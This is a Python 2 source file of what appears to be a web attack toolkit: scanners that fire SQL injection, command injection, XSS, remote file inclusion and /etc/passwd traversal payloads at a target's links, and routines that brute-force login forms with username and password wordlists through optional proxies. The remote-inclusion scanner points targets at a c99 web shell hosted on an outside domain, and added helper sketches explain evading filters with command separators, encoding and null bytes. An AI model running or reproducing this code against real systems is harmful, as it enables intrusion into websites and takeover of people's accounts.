def SQLScan(self):
    # Error-based SQL injection scan: sweep numeric values into each collected
    # parameter and watch the response for database error strings.
    global vuln_links
    Results = ""
    error_msgs = ["error", "sql error", "syntax error", "invalid", "warning"]
    SQLbr = browser()
    for link in vuln_links:
        l = link.split("=")[0]
        for i in range(-1, 999999):  # exhaustive value sweep, one request each
            url = self.target + "/" + l + "=" + str(i)
            try:
                site = SQLbr.open(url)
                src = site.read()
                for msg in error_msgs:
                    if msg in src.lower():
                        Results += url + "\n"
                        print "[+] " + url
                        break  # record each URL once, even if several messages match
            except:
                pass
            time.sleep(1)
    return Results
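
# Illustrative sketch, not part of the scanner above: error-based SQL injection
# is more commonly probed with a single-quote payload than a numeric sweep,
# since a stray quote breaks the query string directly. The function name and
# message list below are assumptions for demonstration only.
def _sqli_quote_probe_demo(url):
    import urllib2
    try:
        src = urllib2.urlopen(url + "'").read().lower()
    except Exception:
        return False
    return any(msg in src for msg in ("sql syntax", "sql error", "warning: mysql"))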
def CMDScan(self):
    # Command-injection scan: request each parameter with the payload "id" and
    # look for the tell-tale "uid=" output (or a shell permission error).
    global vuln_links
    Results = ""
    bash_msgs = ["uid=", "permission denied"]
    payload = "id"
    CMDbr = browser()
    for link in vuln_links:
        l = link.split("=")[0]
        url = self.target + "/" + l + "=" + payload
        try:
            site = CMDbr.open(url)
            src = site.read()
            for msg in bash_msgs:
                if msg in src.lower():
                    Results += url + "\n"
                    print "[+] " + url
                    break  # record each URL once
        except:
            pass
        time.sleep(1)
    return Results
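
# Illustrative sketch: the bare "id" payload above only fires when the
# parameter is passed verbatim to a shell. Injections appended to an existing
# command usually need a separator first; this hypothetical helper builds the
# common variants.
def _cmd_payloads_demo(cmd="id"):
    return [cmd] + [sep + cmd for sep in (";", "|", "&&")]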
def grab_links(self):
    # Collect every href that carries a query string; those parameterised URLs
    # are the candidates the scanners above test.
    br = browser()
    try:
        site = br.open(self.target)
        src = site.read()
        soup = BeautifulSoup(src, "lxml")
        for link in soup.find_all('a'):
            l = link.get("href")
            if l and "?" in l:  # skip anchors without an href attribute
                vuln_links.append(l)
    except:
        pass
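
# browser() is defined elsewhere in this project. A minimal mechanize-based
# stand-in (an assumption about the helper, not its actual implementation):
def _browser_demo():
    import mechanize
    br = mechanize.Browser()
    br.set_handle_robots(False)                      # ignore robots.txt
    br.addheaders = [("User-agent", "Mozilla/5.0")]  # plain browser UA
    return br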
def crack(self):
    print "\n[+] Target: " + self.target
    if self.verbose == 1:
        print "[!] Checking proxy..."
    if self.proxy != "":
        hst, prt = parse_address(self.proxy)
        pr = proxy(hst, prt, self.proxy_type)
        if pr.set_browser_proxy() == True:
            print "[+] Proxy: " + self.proxy
        else:
            print "[-] Invalid or dead proxy"
    else:
        print "[-] Proxy not set"
    print
    if self.verbose == 1:
        print "[!] Connecting to target...\n"
    br = browser()
    try:
        br.open(self.login_page)
        if self.verbose == 1:
            print "[!] Checking wordlist..."
        passwords = open(self.wordslist, "r").readlines()
        if self.verbose == 1:
            print "[!] Attack started...\n"
        for word in passwords:
            password = word.replace("\n", "")
            print "[*] Trying: " + password
            br.select_form(nr=0)            # first form on the page
            br.form['email'] = self.target  # the target is the e-mail address
            br.form['pass'] = password
            resp = br.submit()
            # A failed login redirects to a URL containing "login_attempt".
            if "login_attempt" not in resp.geturl():
                self.results = "Password is " + password
                print "[+] " + self.results
                break
    except:
        self.results = "Failed to crack password"
        print "[-] Failed to connect to target"
        print "[-] " + self.results + "\n"
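
# Illustrative sketch: mechanize addresses form fields by their HTML "name"
# attribute ("email" and "pass" above). To discover the names on an unfamiliar
# login page, the parsed forms can be enumerated; this demo helper is an
# assumption, not part of the tool.
def _list_form_fields_demo(page_url):
    import mechanize
    br = mechanize.Browser()
    br.set_handle_robots(False)
    br.open(page_url)
    for form in br.forms():              # every <form> mechanize parsed
        for control in form.controls:    # each input/select/textarea
            print control.type, control.name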
def grab_links(self):
    print "\n[+] Target: " + self.target
    if self.verbose == 1:
        print "[!] Checking proxy..."
    if self.proxy != "":
        hst, prt = parse_address(self.proxy)
        pr = proxy(hst, prt, self.proxy_type)
        if pr.set_browser_proxy() == True:
            print "[+] Proxy: " + self.proxy
        else:
            print "[-] Invalid or dead proxy"
    else:
        print "[-] Proxy not set"
    print
    if self.verbose == 1:
        print "[!] Connecting to target..."
    br = browser()
    try:
        site = br.open(self.target)
        src = site.read()
        soup = BeautifulSoup(src, "lxml")
        links = soup.find_all('a')
        if self.verbose == 1:
            print "[!] Found %d links\n" % len(links)
        for link in links:
            print link.get("href")
    except:
        self.results = "No results found"
        print "[-] Failed to connect to target"
        print "[-] " + self.results + "\n"
def XSSScan(self):
    # Reflected-XSS scan: inject a script payload and check whether the page
    # reflects its marker text back.
    global vuln_links
    Results = ""
    xss_msg = "hello world!"  # lower case, to match against src.lower()
    payload = "<script>alert(\"Hello world!\");</script>"
    XSSbr = browser()
    for link in vuln_links:
        l = link.split("=")[0]
        url = self.target + "/" + l + "=" + payload
        try:
            site = XSSbr.open(url)
            src = site.read()
            if xss_msg in src.lower():
                Results += url + "\n"
                print "[+] " + url
        except:
            pass
        time.sleep(1)
    return Results
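
# Illustrative sketch: raw "<", ">" and quote characters in a query string can
# be mangled before they reach the target, so payloads are normally
# percent-encoded first. A minimal helper using the Python 2 standard library
# (hypothetical name):
def _encoded_payload_url_demo(base, param, payload):
    import urllib
    return base + "/" + param + "=" + urllib.quote(payload)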
def RFIScan(self):
    # Remote-file-inclusion scan: point each parameter at a remote shell and
    # look for its signature in the response.
    global vuln_links
    Results = ""
    shell = "c99shell"
    payload = "http://www.defcont4.hypersite.com.br/shell/c99.txt?"
    RFIbr = browser()
    for link in vuln_links:
        l = link.split("=")[0]
        url = self.target + "/" + l + "=" + payload
        try:
            site = RFIbr.open(url)
            src = site.read()
            if shell in src.lower():
                Results += url + "\n"
                print "[+] " + url
        except:
            pass
        time.sleep(1)
    return Results
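
# Illustrative sketch of why the payload above ends in "?": if the vulnerable
# include appends a suffix such as ".php", that suffix lands in the remote
# URL's query string and the raw shell source is still fetched. Hypothetical
# helper for demonstration:
def _rfi_url_demo(target, param, remote_file):
    # e.g. include("http://evil/c99.txt" + "?" + ".php") still loads c99.txt
    return target + "/" + param + "=" + remote_file + "?"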
def crack(self):
    print "\n[+] Target: " + self.target
    if self.verbose == 1:
        print "[!] Checking proxy..."
    if self.proxy != "":
        hst, prt = parse_address(self.proxy)
        pr = proxy(hst, prt, self.proxy_type)
        if pr.set_browser_proxy() == True:
            print "[+] Proxy: " + self.proxy
        else:
            print "[-] Invalid or dead proxy"
    else:
        print "[-] Proxy not set"
    print
    if self.verbose == 1:
        print "[!] Connecting to target..."
    br = browser()
    try:
        br.open(self.login_page)
        if self.verbose == 1:
            print "[!] Checking wordlists..."
        usernames = open(self.userslist, "r").readlines()
        passwords = open(self.wordslist, "r").readlines()
        if self.username != "":
            # Known username: iterate over the password list only.
            for word in passwords:
                password = word.replace("\n", "")
                print "[*] Trying: " + password
                br.select_form(nr=0)
                br.form[self.user_form] = self.username
                br.form[self.pass_form] = password
                resp = br.submit()
                # Success only if the response URL shows no sign of a failed
                # login redirect.
                if ("login" not in resp.geturl()) and ("attempt" not in resp.geturl()):
                    self.results = "Password is " + password
                    print "[+] " + self.results
                    break
        else:
            # No username given: try every username/password combination.
            found = False
            for user in usernames:
                username = user.replace("\n", "")
                print "[*] Trying username: " + username
                for word in passwords:
                    password = word.replace("\n", "")
                    print "[*] Trying password: " + password
                    br.select_form(nr=0)
                    br.form[self.user_form] = username
                    br.form[self.pass_form] = password
                    resp = br.submit()
                    if ("login" not in resp.geturl()) and ("attempt" not in resp.geturl()):
                        self.results = "Login is %s:%s" % (username, password)
                        print "[+] " + self.results
                        found = True
                        break
                if found:
                    break  # stop the outer username loop as well
    except:
        self.results = "Failed to crack password"
        print "[-] " + self.results
def LFIScan(self):
    # Local-file-inclusion scan: try to pull /etc/passwd through each
    # parameter, first directly, then behind increasing levels of "../"
    # traversal, each with and without a trailing %00 null byte (which
    # truncates appended extensions on legacy PHP).
    global vuln_links
    Results = ""
    root = "root:x:"
    password_file = "/etc/passwd"
    LFIbr = browser()
    for link in vuln_links:
        l = link.split("=")[0]
        url = self.target + "/" + l + "="
        # Candidate paths: the plain file, then one to ten levels of traversal.
        candidates = [password_file]
        for i in range(10):
            candidates.append("../" * i + ".." + password_file)
        found = False
        for path in candidates:
            for suffix in ("", "%00"):
                try:
                    site = LFIbr.open(url + path + suffix)
                    src = site.read()
                    if root in src.lower():
                        Results += url + "\n"
                        print "[+] " + url
                        found = True
                        break
                except:
                    pass
            if found:
                break  # record each vulnerable URL once
        time.sleep(1)
    return Results
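
# Illustrative sketch: the traversal candidates used above can also be built
# up front, which makes the depth and the legacy %00 variants explicit. Name
# and depth are assumptions for demonstration only.
def _lfi_traversal_demo(max_depth=10):
    candidates = []
    for depth in range(max_depth + 1):
        path = "../" * depth + "etc/passwd"
        candidates.append(path)
        candidates.append(path + "%00")  # null byte truncates an appended ".php"
    return candidates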